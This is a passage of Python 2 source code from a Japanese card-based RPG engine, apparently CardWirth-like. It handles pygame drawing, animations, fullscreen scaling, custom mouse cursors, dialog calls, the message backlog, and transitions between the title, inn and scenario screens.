for _i in filter(lambda i: not i in cw.cwpy.sdata.infocards_beforeevent,
cw.cwpy.sdata.get_infocards(False)):
# イベント開始前には持っていなかった情報カードを入手している
cw.cwpy.sdata.notice_infoview = True
cw.cwpy.statusbar.change()
break
cw.cwpy.sdata.infocards_beforeevent = None
if self._need_disposition:
self.disposition_pcards()
self.draw()
self.update_groups()
def update_groups(self):
self.cardgrp.update(self.scr_draw)
self.topgrp.update(self.scr_draw)
self.sbargrp.update(self.scr_draw)
def return_takenoutcard(self, checkevent=True):
# 一時的に荷物袋から出したカードを戻す(消滅していなければ)
if self.card_takenouttemporarily and not self.selectedheader and (not checkevent or not self.is_runningevent()) and not self.is_battlestatus():
owner = self.card_takenouttemporarily.get_owner()
if owner and isinstance(owner, cw.character.Character) and self.sdata.party_environment_backpack:
self.clear_inusecardimg(self.card_takenouttemporarily.get_owner())
cw.cwpy.trade("BACKPACK", header=self.card_takenouttemporarily, from_event=False, parentdialog=None, sound=False, call_predlg=False, sort=True)
cw.cwpy.card_takenouttemporarily = None
def fix_updated_file(self, force=False):
# JPDC撮影などで更新されたメニューカードと背景を更新する
if not force and (not self.is_playingscenario() or self.is_runningevent()):
return
if self.sdata.ex_cache:
if self.background.use_excache:
self.background.use_excache = False
self.file_updates_bg = True
for mcard in self.get_mcards():
if mcard.is_initialized() and mcard.cardimg.use_excache:
self.file_updates.add(mcard)
mcard.cardimg.use_excache = False
for path in self.sdata.ex_cache.keys():
path = os.path.normcase(os.path.normpath(os.path.abspath(path)))
self.sdata.resource_cache.clear()
self.sdata.resource_cache_size = 0
self.sdata.ex_cache.clear()
if self.background.pc_cache:
self.background.pc_cache.clear()
if self.is_curtained():
self.background.reload_jpdcimage = True
else:
if self.file_updates_bg:
self.background.reload(False)
self.file_updates_bg = False
elif not self.background.reload_jpdcimage and self.background.has_jpdcimage:
self.background.reload(False, ttype=(None, None))
self.background.reload_jpdcimage = True
if self.file_updates:
for mcard in self.get_mcards("visible"):
if mcard in self.file_updates:
cw.animation.animate_sprite(mcard, "hide")
mcard.cardimg.fix_pcimage_updated()
mcard.cardimg.clear_cache()
mcard.update_image()
cw.animation.animate_sprite(mcard, "deal")
self.file_updates.clear()
def proc_animation(self):
removes = set()
for sprite in self.animations:
if sprite.status <> sprite.anitype:
removes.add(sprite)
continue # アニメーション終了
clip = pygame.Rect(sprite.rect)
ticks = pygame.time.get_ticks()
if ticks < sprite.start_animation:
sprite.start_animation = ticks
frame = int((ticks - sprite.start_animation) / 1000.0 * 60.0)
if frame <= sprite.frame:
continue # フレーム進行無し
sprite.frame = frame
method = getattr(sprite, "update_" + sprite.status, None)
if method:
method()
else:
removes.add(sprite)
continue # アニメーション中止
clip.union_ip(sprite.rect)
self.draw(clip=clip)
if sprite.status <> sprite.anitype:
removes.add(sprite) # アニメーション終了
for sprite in removes:
self.stop_animation(sprite)
def stop_animation(self, sprite):
if sprite in self.animations:
sprite.anitype = ""
sprite.start_animation = 0
sprite.frame = 0
self.animations.remove(sprite)
def draw_to(self, scr, draw_desc):
dirty_rects = cw.sprite.background.layered_draw_ex(self.cardgrp, scr)
dirty_rects.extend(self.topgrp.draw(scr))
dirty_rects.extend(self.backloggrp.draw(scr))
for music in self.music:
if music.movie_scr:
scr.blit(music.movie_scr, (0, 0))
clip2 = scr.get_clip()
scr.set_clip(None)
dirty_rects.extend(self.statusbar.layered_draw_ex(self.sbargrp, scr, draw_desc))
scr.set_clip(clip2)
return dirty_rects
def lazy_draw(self):
if self._lazy_draw:
self.draw()
def set_lazydraw(self):
self._lazy_draw = True
def add_lazydraw(self, clip):
if self._lazy_clip:
self._lazy_clip.union_ip(clip)
else:
self._lazy_clip = pygame.Rect(clip)
def draw(self, mainloop=False, clip=None):
if not clip:
self._lazy_draw = False
if self.has_inputevent or not mainloop:
# SpriteGroup描画
# FIXME: 描画領域を絞り込むと時々カードの描画中に
# 次に表示される背景が映り込んでしまう
if clip:
if self._lazy_clip:
clip = self._lazy_clip.union_ip(clip)
#PyLite:ローカル変数実装時に位置が変わっている
self.scr_draw.set_clip(clip)
self.cardgrp.set_clip(clip)
self.topgrp.set_clip(clip)
self.backloggrp.set_clip(clip)
self.sbargrp.set_clip(clip)
self._lazy_clip = None
dirty_rects = self.draw_to(self.scr_draw, True)
if not self.setting.smoothexpand or cw.UP_SCR % cw.UP_WIN == 0 or cw.UP_WIN % cw.UP_SCR == 0:
scale = pygame.transform.scale
else:
scale = cw.image.smoothscale
def update_clip(scale):
clx = int(clip.left * scale) - 2
cly = int(clip.top * scale) - 2
clw = int(clip.width * scale) + 5
clh = int(clip.height * scale) + 5
return pygame.Rect(clx, cly, clw, clh)
# 画面更新
if self.scr_fullscreen:
scr = scale(self.scr_draw, self.scr_size)
if clip:
clip2 = update_clip(self.scr_scale)
clip3 = pygame.Rect(clip2.left + self.scr_pos[0], clip2.top + self.scr_pos[1], clip2.width, clip2.height)
self.scr_fullscreen.blit(scr, clip3.topleft, clip2)
pygame.display.update(clip3)
else:
self.scr_fullscreen.blit(scr, self.scr_pos)
pygame.display.update()
elif self.scr_draw <> self.scr:
scr = scale(self.scr_draw, self.scr.get_size())
if clip:
clip2 = update_clip(float(cw.UP_WIN) / cw.UP_SCR)
self.scr.blit(scr, clip2.topleft, clip2)
pygame.display.update(clip2)
else:
self.scr.blit(scr, (0, 0))
pygame.display.update()
else:
if clip:
pygame.display.update(clip)
else:
pygame.display.update(dirty_rects)
pos = cw.s((0, 0))
size = cw.s(cw.SIZE_AREA)
self.scr_draw.set_clip(pygame.Rect(pos, size))
self._update_clip()
size = cw.s(cw.SIZE_GAME)
self.sbargrp.set_clip(pygame.Rect(pos, size))
self.event.eventtimer = 0
def init_fullscreenparams(self):
"""フルスクリーン表示用のパラメータを計算する。"""
if self.scr_fullscreen:
fsize = self.scr_fullscreen.get_size()
ssize = cw.s(cw.SIZE_GAME)
a = float(fsize[0]) / ssize[0]
b = float(fsize[1]) / ssize[1]
scale = min(a, b)
size = (int(ssize[0] * scale), int(ssize[1] * scale))
x = (fsize[0] - size[0]) / 2
y = (fsize[1] - size[1]) / 2
self.scr_size = size
self.scr_scale = scale
self.scr_pos = (x, y)
ssize = cw.SIZE_GAME
a = float(fsize[0]) / ssize[0]
b = float(fsize[1]) / ssize[1]
scale = min(a, b)
# FIXME: シナリオ選択ダイアログの縦幅が画面解像度を
# 超えてしまうので若干小さめにする
cw.UP_WIN = scale * 0.9
cw.UP_WIN_M = scale
else:
self.scr_size = self.scr.get_size()
self.scr_scale = 1.0
self.scr_pos = (0, 0)
def update_fullscreenbackground(self):
if self.scr_fullscreen:
# 壁紙
if self.setting.fullscreenbackgroundtype == 0:
self.scr_fullscreen.fill((0, 0, 0))
fname = u""
elif self.setting.fullscreenbackgroundtype == 1:
self.scr_fullscreen.fill((255, 255, 255))
fname = self.setting.fullscreenbackgroundfile
elif self.setting.fullscreenbackgroundtype == 2:
self.scr_fullscreen.fill((255, 255, 255))
fname = self.setting.fullscreenbackgroundfile
fname = cw.util.find_resource(cw.util.join_paths(self.skindir, fname), self.rsrc.ext_img)
if fname:
back = cw.util.load_image(fname, can_loaded_scaledimage=True)
if back.get_width():
if self.setting.fullscreenbackgroundtype == 2:
back = cw.wins(back)
padsize = back.get_size()
fsize = self.scr_fullscreen.get_size()
for x in xrange(0, fsize[0], padsize[0]):
for y in xrange(0, fsize[1], padsize[1]):
self.scr_fullscreen.blit(back, (x, y))
width = 16
x = self.scr_pos[0] - width/2-1
y = self.scr_pos[1] - width/2-1
w = self.scr_size[0] + width+1
h = self.scr_size[1] + width+1
sur = pygame.Surface((w, h)).convert_alpha()
sur.fill((255, 255, 255, 192))
self.scr_fullscreen.blit(sur, (x, y))
def change_cursor(self, name="arrow", force=False):
"""マウスカーソルを変更する。
name: 変更するマウスカーソルの名前。
(arrow, diamond, broken_x, tri_left, tri_right, mouse)"""
if not force and self.cursor == name:
return
self.cursor = name
if isinstance(self.selection, cw.sprite.statusbar.StatusBarButton):
name = "arrow"
if name == "arrow":
if 2 <= cw.dpi_level:
# 48x48
s = (
"### ",
"#### ",
"##.## ",
"##..## ",
"##...## ",
"##....## ",
"##.....## ",
"##......## ",
"##.......## ",
"##........## ",
"##.........## ",
"##..........## ",
"##...........## ",
"##............## ",
"##.............## ",
"##..............## ",
"##...............## ",
"##................## ",
"##.................## ",
"##..................## ",
"##...................## ",
"##....................## ",
"##...........############ ",
"##...........############# ",
"##.......##...## ",
"##......###...## ",
"##.....#####...## ",
"##....### ##...## ",
"##...### ##...## ",
"##..### ##...## ",
"##.### ##...## ",
"##### ##...## ",
"#### ##...## ",
"### ##...## ",
"## ##...## ",
" ##..### ",
" ##### ",
" ### ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",)
else:
# 24x24
s = (
" ",
"## ",
"#.# ",
"#..# ",
"#...# ",
"#....# ",
"#.....# ",
"#......# ",
"#.......# ",
"#........# ",
"#.........# ",
"#..........# ",
"#......##### ",
"#...#..# ",
"#..# #..# ",
"#.# #..# ",
"## #..# ",
" #..# ",
" ### ",
" ",
" ",
" ",
" ",
" ",)
if self.setting.cursor_type == cw.setting.CURSOR_WHITE:
cursor = pygame.cursors.compile(s, "#", ".", "o")
else:
cursor = pygame.cursors.compile(s, ".", "#", "o")
pygame.mouse.set_cursor((len(s[0]), len(s)), (0, 0), *cursor)
#pygame.mouse.set_cursor(*pygame.cursors.arrow)
#pygame.mouse.set_visible(False)#PyLiteカーソル非表示
elif name == "diamond":
pygame.mouse.set_cursor(*pygame.cursors.diamond)
elif name == "broken_x":
pygame.mouse.set_cursor(*pygame.cursors.broken_x)
elif name == "tri_left":
pygame.mouse.set_cursor(*pygame.cursors.tri_left)
elif name == "tri_right":
pygame.mouse.set_cursor(*pygame.cursors.tri_right)
elif name == "mouse":
if 2 <= cw.dpi_level:
# 48x48
s = (
" ##..## #################### ",
" ##..## #################### ",
" ##..## ##................## ",
" ##..## ##................## ",
" ##..## ##........##......## ",
" ##..## ##.......###......## ",
" ################.....###.......## ",
" ####################...##........## ",
" ####......##......####............## ",
" ###........##........###...........## ",
" ##.........##.........##...#####...## ",
"###.........##.........###..#####...## ",
"##..........##..........##..........## ",
"##..........##..........##..........## ",
"##..........##..........##..#####...## ",
"##..........##..........##..#####...## ",
"##..........##..........##..........## ",
"##..........##..........##..........## ",
"##..........##..........##..........## ",
"##..........##..........##..........## ",
"##########################..........## ",
"############..############..........## ",
"##......................##..........## ",
"##......................##..........## ",
"##......................##..........## ",
"##......................##..........## ",
"##......................##..........## ",
"##......................##..........## ",
"##......................############## ",
"##......................############## ",
"##......................## ",
"##......................## ",
"###....................### ",
" ##....................## ",
" ###..................### ",
" ###................### ",
" ################### ###### #### ##### ",
" #################### ############ ###### ",
" ##.....###..## ##..####.....###..# ##..## ",
" ##.......##..## ##..###.......##..###..## ",
"##...#######..## ##..##...#######..##..## ",
"##..########..## ##..##..########.....## ",
"##..########..######..##..########..##..## ",
"##...#######..######..##...#######..###..## ",
" ##.......##......##..###.......##..# ##..## ",
" ##.....###......##..####.....###..# ##..## ",
" #################### ############ ##### ",
" ###### ############ ###### #### #### ",)
point = (14, 14)
else:
# 24x24
s = (
" #.# ########## ",
" #.# #........# ",
" #.# #....#...# ",
" #########..#....# ",
" #....#....#......# ",
"#.....#.....#.##..# ",
"#.....#.....#.....# ",
"#.....#.....#.##..# ",
"#.....#.....#.....# ",
"#.....#.....#.....# ",
"######.######.....# ",
"#...........#.....# ",
"#...........#.....# ",
"#...........#.....# ",
"#...........####### ",
"#...........# ",
"#...........# ",
" #.........# ",
" ########## ### # # ",
" #...#.# #.##...#.##.# ",
"#.####.# #.#.####...# ",
"#.####.###.#.####.#.# ",
" #...#...#.##...#.##.# ",
" ######### ### # # ",)
point = (7, 7)
if self.setting.cursor_type == cw.setting.CURSOR_WHITE:
cursor = pygame.cursors.compile(s, "#", ".", "o")
else:
cursor = pygame.cursors.compile(s, ".", "#", "o")
pygame.mouse.set_cursor((len(s[0]), len(s)), point, *cursor)
if not force:
# FIXME: 一度マウスポインタを移動しないと変更されない
pos = pygame.mouse.get_pos()
x = pos[0] - 1 if 0 < pos[0] else pos[0] + 1
y = pos[1] - 1 if 0 < pos[1] else pos[1] + 1
pygame.mouse.set_pos(x, y)
pygame.mouse.set_pos(pos)
def call_dlg(self, name, **kwargs):
"""ダイアログを開く。
name: ダイアログ名。cw.frame参照。
"""
if name not in self.frame.dlgeventtypes:
cw.cwpy.call_dlg("ERROR", text=u"ダイアログ「%s」は存在しません。" % name)
return
stack = self._showingdlg
self.lock_menucards = True
self.input(eventclear=True)
self._showingdlg += 1
self.statusbar.clear_volumebar()
if isinstance(self.selection, cw.sprite.statusbar.StatusBarButton):
# 表示が乱れる場合があるので
# ステータスバーのボタンからフォーカスを外しておく
self.mousepos = (-1, -1)
self.keyevent.clear() # キー入力初期化
event = wx.PyCommandEvent(self.frame.dlgeventtypes[name])
event.args = kwargs
if threading.currentThread() == self:
self.draw()
def func():
# BUG: シナリオインストールダイアログを開いた後で
# フィルタイベントの挙動がおかしくなる
# self.frame.app.SetCallFilterEvent(True)
pass
#self.frame.exec_func(func)
self.frame.AddPendingEvent(event)
if sys.platform == "win32":
while self.is_running() and self.frame.IsEnabled() and stack < self._showingdlg:
pass
else:
#self.frame.app.SetCallFilterEvent(True)
self.frame.ProcessEvent(event)
def call_modaldlg(self, name, **kwargs):
"""ダイアログを開き、閉じるまで待機する。
name: ダイアログ名。cw.frame参照。
"""
stack = self._showingdlg
self.call_dlg(name, **kwargs)
if threading.currentThread() == self:
while self.is_running() and stack < self._showingdlg:
self.main_loop(False)
def call_predlg(self):
"""直前に開いていたダイアログを再び開く。"""
self.return_takenoutcard(checkevent=False)
if self.pre_dialogs:
pre_info = self.pre_dialogs[-1]
callname = pre_info[0]
if 0 <= self.areaid and self.is_playingscenario() and callname in ("CARDPOCKET", "CARDPOCKETB"):
# ゲームオーバーになった場合は開かない
if cw.cwpy.is_gameover():
self.pre_dialogs.pop()
return
# 手札カードダイアログの選択者が行動不能か
# 対象消去されている場合は開かない
index2 = pre_info[1]
if isinstance(index2, cw.character.Character) and\
(index2.is_vanished() or ((not index2.is_active() and not self.areaid in cw.AREAS_TRADE))):
self.pre_dialogs.pop()
self.lock_menucards = False
return
self.call_modaldlg(callname)
else:
self.lock_menucards = False
def kill_showingdlg(self):
self._showingdlg -= 1
if self._showingdlg <= 0:
# BUG: シナリオインストールダイアログ関連
# self.frame.app.SetCallFilterEvent(False)
if not self.is_runningevent():
self.exec_func(self.clear_selection)
def exec_func(self, func, *args, **kwargs):
"""CWPyスレッドで指定したファンクションを実行する。
func: 実行したいファンクションオブジェクト。
"""
event = pygame.event.Event(pygame.USEREVENT, func=func, args=args,
kwargs=kwargs)
post_pygameevent(event)
def sync_exec(self, func, *args, **kwargs):
"""CWPyスレッドで指定したファンクションを実行し、
終了を待ち合わせる。ファンクションの戻り値を返す。
func: 実行したいファンクションオブジェクト。
"""
if threading.currentThread() == self:
return func(*args, **kwargs)
else:
result = [None]
class Running(object):
def __init__(self):
self.isrun = True
running = Running()
def func2(running, result, func, *args, **kwargs):
result[0] = func(*args, **kwargs)
running.isrun = False
self.exec_func(func2, running, result, func, *args, **kwargs)
while running.isrun and self.frame.IsEnabled() and self.is_running():
time.sleep(0.001)
return result[0]
def set_expanded(self, flag, expandmode="", force=False, displaysize=None):
"""拡大表示する。すでに拡大表示されている場合は解除する。
flag: Trueなら拡大表示、Falseなら解除。
"""
if not force and self.is_expanded() == flag:
return
if not expandmode:
expandmode = self.expand_mode if self.is_expanded() else self.setting.expandmode
if displaysize is None and expandmode == "FullScreen" and flag:
def func():
dsize = self.frame.get_displaysize()
self.exec_func(self.set_expanded, flag, expandmode, force, dsize)
self.frame.exec_func(func)
return
updatedrawsize = force or self.setting.expanddrawing <> 1
if expandmode == "None":
if force:
self.set_fullscreen(False)
self.expand_mode = "None"
self.setting.is_expanded = False
cw.UP_WIN = 1
cw.UP_WIN_M = cw.UP_WIN
self.update_scale(1, True, False, updatedrawsize)
self.clear_inputevents()
else:
return
elif expandmode == "FullScreen":
# フルスクリーン
if self.is_showingdebugger() and flag:
self.play_sound("error")
s = u"デバッガ表示中はフルスクリーン化できません。"
self.call_modaldlg("MESSAGE", text=s)
else:
pos = pygame.mouse.get_pos()
pygame.mouse.set_pos([-1, -1])
self.setting.is_expanded = flag
if flag:
assert not displaysize is None
self.expand_mode = expandmode
dsize = displaysize
self.scr_fullscreen = pygame.display.set_mode((dsize[0], dsize[1]), 0)
self.scr = pygame.Surface(cw.s(cw.SIZE_GAME)).convert()
self.scr_draw = self.scr
self.set_fullscreen(True)
self.update_scale(self.setting.expanddrawing, True, False, updatedrawsize)
else:
cw.UP_WIN = 1
cw.UP_WIN_M = cw.UP_WIN
self.expand_mode = "None"
self.scr_fullscreen = None
self.scr = pygame.display.set_mode(cw.wins(cw.SIZE_GAME), 0)
self.scr_draw = self.scr
self.set_fullscreen(False)
self.update_scale(1, True, False, updatedrawsize)
while not self.frame.IsFullScreen() == flag:
pass
# 一度マウスポインタを画面外へ出さないと
# フォーカスを失うことがある
pygame.mouse.set_pos(pos)
self.clear_inputevents()
else:
# 拡大
try:
def func():
self.set_fullscreen(False)
self.frame.exec_func(func)
scale = float(expandmode)
scale = max(scale, 0.5)
self.setting.is_expanded = flag
if flag:
self.expand_mode = expandmode
cw.UP_WIN = scale
cw.UP_WIN_M = cw.UP_WIN
self.update_scale(self.setting.expanddrawing, True, False, updatedrawsize)
else:
self.expand_mode = "None"
cw.UP_WIN = 1
cw.UP_WIN_M = cw.UP_WIN
self.update_scale(1, True, False, updatedrawsize)
self.clear_inputevents()
except Exception:
cw.util.print_ex()
self.has_inputevent = True
def show_message(self, mwin):
"""MessageWindowを表示し、次コンテントのindexを返す。
mwin: MessageWindowインスタンス。
"""
eventhandler = cw.eventhandler.EventHandlerForMessageWindow(mwin)
self.clear_selection()
locks = self.lock_menucards
self.lock_menucards = False
if self.is_showingdebugger() and self.event and self.event.is_stepexec():
self.event.refresh_tools()
self.event.refresh_activeitem()
self.input()
while self.is_running() and mwin.result is None:
self.update()
if mwin.result is None:
self.input()
self.draw(not mwin.is_drawing or self.has_inputevent)
self.tick_clock()
self.input()
eventhandler.run()
self.clear_selection()
self.lock_menucards = locks
# バックログの保存
if self.is_playingscenario() and self.setting.backlogmax and isinstance(mwin.result, int) and\
not isinstance(mwin, cw.sprite.message.MemberSelectWindow):
if self.setting.backlogmax <= len(self.sdata.backlog):
self.sdata.backlog.pop(0)
self.sdata.backlog.append(cw.sprite.message.BacklogData(mwin))
self.advlog.show_message(mwin)
self.statusbar.change(False)
# cwpylist, index 初期化
self.list = self.get_mcards("visible")
self.index = -1
# スプライト削除
seq = []
seq.extend(self.cardgrp.remove_sprites_of_layer(cw.LAYER_MESSAGE))
seq.extend(self.cardgrp.remove_sprites_of_layer(cw.LAYER_SPMESSAGE))
seq.extend(self.cardgrp.remove_sprites_of_layer(cw.LAYER_SELECTIONBAR_1))
seq.extend(self.cardgrp.remove_sprites_of_layer(cw.LAYER_SPSELECTIONBAR_1))
seq.extend(self.cardgrp.remove_sprites_of_layer(cw.LAYER_SELECTIONBAR_2))
seq.extend(self.cardgrp.remove_sprites_of_layer(cw.LAYER_SPSELECTIONBAR_2))
seq.extend(self.sbargrp.remove_sprites_of_layer(cw.sprite.statusbar.LAYER_MESSAGE))
# 互換性マーク削除
if self.is_playingscenario():
self.sdata.set_versionhint(cw.HINT_MESSAGE, None)
# 次のアニメーションの前に再描画を行う
for sprite in seq:
self.add_lazydraw(sprite.rect)
self.set_lazydraw()
# メッセージ表示中にシナリオ強制終了(F9)などを行った場合、
# イベント強制終了用のエラーを送出する。
if isinstance(mwin.result, Exception):
raise mwin.result
else:
return mwin.result
def has_backlog(self):
"""表示可能なメッセージログがあるか。"""
return bool(self.sdata.backlog)
def show_backlog(self, n=0):
"""直近から過去に遡ってn回目のメッセージを表示する。
n: 遡る量。0なら最後に閉じたメッセージ。
もっとも古いメッセージよりも大きな値の場合は
もっとも古いメッセージを表示する。
"""
if not self.has_backlog():
return
length = len(self.sdata.backlog)
if length <= n:
n = length - 1
index = length - 1 - n
eventhandler = cw.eventhandler.EventHandlerForBacklog(self.sdata.backlog, index)
cursor = self.cursor
self.change_cursor()
self._log_handler = eventhandler
try:
while self.is_running() and eventhandler.is_showing() and\
cw.cwpy.sdata.is_playing and self._is_showingbacklog:
self.sbargrp.update(self.scr_draw)
if self.has_inputevent:
self.draw()
self.tick_clock()
self.input()
eventhandler.run()
if len(self.sdata.backlog) < length:
# 最大数の設定変更によりログ数が減った場合
if not self.sdata.backlog:
break
eventhandler.index -= length - len(self.sdata.backlog)
length = len(self.sdata.backlog)
if eventhandler.index < 0:
eventhandler.index = 0
eventhandler.update_sprites()
finally:
self._log_handler = None
self.change_cursor(cursor)
# 表示終了
eventhandler.exit_backlog(playsound=False)
def set_backlogmax(self, backlogmax):
"""メッセージログの最大数を設定する。
"""
self.setting.backlogmax = backlogmax
if not self.has_backlog():
return
if backlogmax < len(self.sdata.backlog):
del self.sdata.backlog[0:len(self.sdata.backlog)-backlogmax]
def set_titlebar(self, s):
"""タイトルバーテキストを設定する。
s: タイトルバーテキスト。
"""
self.frame.exec_func(self.frame.SetTitle, s)
def get_yesnoresult(self):
"""call_yesno()の戻り値を取得する。"""
return self._yesnoresult
#-------------------------------------------------------------------------------
# ゲーム状態遷移用メソッド
#-------------------------------------------------------------------------------
def set_status(self, name):
isbattle = "ScenarioBattle" in (name, self.status)
quickhide = (self.setting.all_quickdeal and not isbattle)
self.status = name
force_dealspeed = self.force_dealspeed
if quickhide:
self.force_dealspeed = self.setting.dealspeed if self.setting.quickdeal else -1
try:
self.hide_cards(True, quickhide=quickhide)
finally:
self.force_dealspeed = force_dealspeed
self.pre_areaids = []
self.pre_dialogs = []
self.pre_mcards = []
def startup(self, loadyado=True):
"""起動時のアニメーションを表示してから
タイトル画面へ遷移する。"""
resdir = cw.util.join_paths(cw.cwpy.skindir, u"Resource/Image/Other")
seq = []
for event in self.events:
if event.type == pygame.locals.USEREVENT:
seq.append(event)
self.events = seq
self.cut_animation = False
self.wait_showcards = False
# 必要なスプライトの読み込み
if not self._init_resources():
self._running = False
return
for music in self.music:
music.stop()
optyado = cw.OPTIONS.yado
cw.OPTIONS.yado = ""
if not optyado and self.setting.startupscene == cw.setting.OPEN_LAST_BASE and loadyado:
optyado = self.setting.lastyado
cw.OPTIONS.party = ""
cw.OPTIONS.scenario = ""
if optyado:
if os.path.isabs(optyado):
optyado = cw.util.relpath(optyado, u"Yado")
optyado = cw.util.join_paths(u"Yado", optyado)
env = cw.util.join_paths(optyado, "Environment.xml")
if os.path.isfile(env):
self.set_status("Title")
self._init_attrs()
if self.load_yado(optyado):
return
else:
name = cw.header.GetName(env).name
s = u"「%s」は他の起動で使用中です。" % (name)
self.call_modaldlg("MESSAGE", text=s)
# 起動オプションでの宿の指定に失敗した場合は
# これらのオプションは無効
cw.OPTIONS.party = ""
cw.OPTIONS.scenario = ""
self.sdata = cw.data.SystemData()
self.statusbar.change()
try:
fpath = cw.util.join_paths(self.skindir, u"Resource/Xml/Animation/Opening.xml")
anime = cw.sprite.animationcell.AnimationCell(fpath, cw.SIZE_AREA, (0, 0), self.topgrp, "title")
self.draw()
cw.animation.animate_sprite(anime, "animation", clearevent=False)
# スプライトを解除する
self.topgrp.remove_sprites_of_layer("title")
if self.cut_animation:
ttype = ("Default", "Default")
self.cut_animation = False
else:
ttype = ("None", "None")
self.wait_showcards = True
self.set_title(ttype=ttype)
except cw.event.EffectBreakError:
# 他のスキンへの切り替えなどで中止
self.topgrp.remove_sprites_of_layer("title")
def set_title(self, init=True, ttype=("Default", "Default")):
"""タイトル画面へ遷移。"""
del self.pre_dialogs[:]
del self.pre_areaids[:]
if self.ydata and self.ydata.losted_sdata:
self.ydata.losted_sdata.end(failure=True)
self.ydata.losted_sdata = None
self.load_party(None, chgarea=False)
elif self.ydata and self.ydata.party:
self.load_party(None, chgarea=False)
if isinstance(self.sdata, cw.data.SystemData):
self.sdata.save_variables()
self.set_status("Title")
self._init_attrs()
self.update_titlebar()
self.statusbar.change()
self.change_area(1, ttype=ttype)
def _init_attrs(self):
self.background.clear_background()
for i in xrange(len(self.lastsound_scenario)):
if self.lastsound_scenario[i]:
self.lastsound_scenario[i].stop(True)
self.lastsound_scenario[i] = None
cw.util.remove_temp()
self.yadodir = ""
self.tempdir = ""
self.setting.scenario_narrow = ""
self.setting.lastscenario = []
self.setting.lastscenariopath = ""
self.setting.last_storehousepage = 0
self.setting.last_backpackpage = 0
self.ydata = None
self.sdata = cw.data.SystemData()
cw.tempdir = cw.tempdir_init
cw.util.release_mutex()
def set_yado(self):
"""宿画面へ遷移。"""
# ゲームオーバーしたパーティの破棄処理を行う
if self.ydata and self.ydata.losted_sdata:
self.ydata.party.lost()
self.ydata.losted_sdata.end()
self.ydata.losted_sdata = None
self.load_party(None, chgarea=False)
self.set_status("Yado")
self.background.clear_background()
msglog = self.sdata.backlog
self.sdata = cw.data.SystemData()
self.sdata.load_variables()
self.sdata.backlog = msglog
self.update_titlebar()
# 冒険の中断やF9時のためにカーテン消去
self.clear_curtain()
self.statusbar.change()
if self.ydata.party:
# パーティを選択中
areaid = 2
self.ydata.party.remove_numbercoupon()
for pcard in self.get_pcards():
pcard.clear_action()
# 全員対象消去による戦闘の敗北から
# シナリオクリアへ直結した場合の処置
if not self.ydata.party.members:
self.dissolve_party()
areaid = 1
elif not self.ydata.is_empty() or self.ydata.is_changed():
# パーティを選択中でない
areaid = 1
else:
# 初期状態
areaid = 3
def change_area():
self.change_area(areaid, force_updatebg=True)
self.is_pcardsselectable = self.ydata and self.ydata.party
if self.ydata.skindirname <> cw.cwpy.setting.skindirname:
self.update_skin(self.ydata.skindirname, changearea=False, afterfunc=change_area)
else:
change_area()
def start_scenario(self):
"""
シナリオ選択ダイアログで選択されたシナリオがあればスタートする。
"""
if self.selectedscenario:
self.set_scenario(self.selectedscenario, manualstart=True)
self.selectedscenario = None
def set_scenario(self, header=None, lastscenario=[][:], lastscenariopath="",
resume=False, manualstart=False):
"""シナリオ画面へ遷移。
header: ScenarioHeader
"""
self.is_processing = True
self.set_status("Scenario")
self.battle = None
if self.ydata.skindirname <> cw.cwpy.setting.skindirname:
def func():
self._set_scenario_impl(header, lastscenario, lastscenariopath, resume, manualstart)
self.update_skin(self.ydata.skindirname, changearea=False, afterfunc=func)
else:
self._set_scenario_impl(header, lastscenario, lastscenariopath, resume, manualstart)
def _set_scenario_impl(self, header, lastscenario, lastscenariopath, resume, manualstart):
if header and not isinstance(self.sdata, cw.data.ScenarioData):
def load_failure(showerror):
# 読込失敗(帰還)
self.is_processing = False
if showerror:
s = u"シナリオの読み込みに失敗しました。"
self.call_modaldlg("ERROR", text=s)
if isinstance(self.sdata, cw.data.ScenarioData):
self.sdata.end(failure=True)
self.set_yado()
if self.is_showingdebugger() and self.event:
self.event.refresh_variablelist()
try:
if isinstance(self.sdata, cw.data.SystemData):
self.sdata.save_variables()
self.sdata = cw.data.ScenarioData(header)
if cw.cwpy.ydata:
cw.cwpy.ydata.changed()
self.statusbar.change(False)
loaded, musicpaths = self.sdata.set_log()
self.sdata.start()
self.update_titlebar()
areaid = self.sdata.startid
if lastscenario or lastscenariopath:
self.ydata.party.set_lastscenario(lastscenario, lastscenariopath)
if not loaded:
self.ydata.party.set_numbercoupon()
def func(loaded, musicpaths, areaid):
self.is_processing = False
quickdeal = resume and self.setting.all_quickdeal
try:
name = self.sdata.get_areaname(self.sdata.startid)
if name is None:
if resume:
# 再開時に読込失敗
load_failure(True)
return
# 開始エリアが存在しない(帰還)
s = u"シナリオに開始エリアが設定されていません。"
self.call_modaldlg("ERROR", text=s)
self.check_level(True)
self.sdata.end(failure=True)
self.set_yado()
return
if manualstart:
dataversion = self.sdata.summary.getattr(".", "dataVersion", "")
if not dataversion in cw.SUPPORTED_WSN:
s = u"対応していないWSNバージョン(%s)のシナリオです。\n正常に動作しない可能性がありますが、開始しますか?" % (dataversion)
self.call_modaldlg("YESNO", text=s)
if self.get_yesnoresult() <> wx.ID_OK:
self.sdata.end(failure=True)
self.set_yado()
return
if not resume:
for pcard in self.get_pcards():
pcard.set_fullrecovery()
pcard.update_image()
if musicpaths:
for i, (musicpath, _subvolume, _loopcount, inusecard) in enumerate(musicpaths):
music = self.music[i]
if music.path <> music.get_path(musicpath, inusecard):
music.stop()
force_dealspeed = self.force_dealspeed
if quickdeal:
self.force_dealspeed = self.setting.dealspeed if self.setting.quickdeal else -1
try:
self.change_area(areaid, not loaded, loaded, quickdeal=quickdeal, doanime=not resume, resume=True)
finally:
self.force_dealspeed = force_dealspeed
if musicpaths:
for i, (musicpath, subvolume, loopcount, inusecard) in enumerate(musicpaths):
music = self.music[i]
music.play(musicpath, subvolume=subvolume, loopcount=loopcount, inusecard=inusecard)
if self.is_showingdebugger() and self.event:
self.event.refresh_variablelist()
if not self.setting.lastscenariopath:
self.setting.lastscenariopath = header.get_fpath()
except:
# 読込失敗(帰還)
cw.util.print_ex()
self.exec_func(load_failure, True)
self.clear_inputevents()
self.exec_func(func, loaded, musicpaths, areaid)
except cw.event.EffectBreakError:
# 手動で中止
if not self.is_runningstatus():
return
self.exec_func(load_failure, False)
except:
if not self.is_runningstatus():
return
# 読込失敗(帰還)
cw.util.print_ex()
self.exec_func(load_failure, True)
else:
self.statusbar.change(False)
self.is_processing = False
self.is_pcardsselectable = self.ydata and self.ydata.party
def set_battle(self):
"""シナリオ戦闘画面へ遷移。"""
self.set_status("ScenarioBattle")
def set_gameover(self):
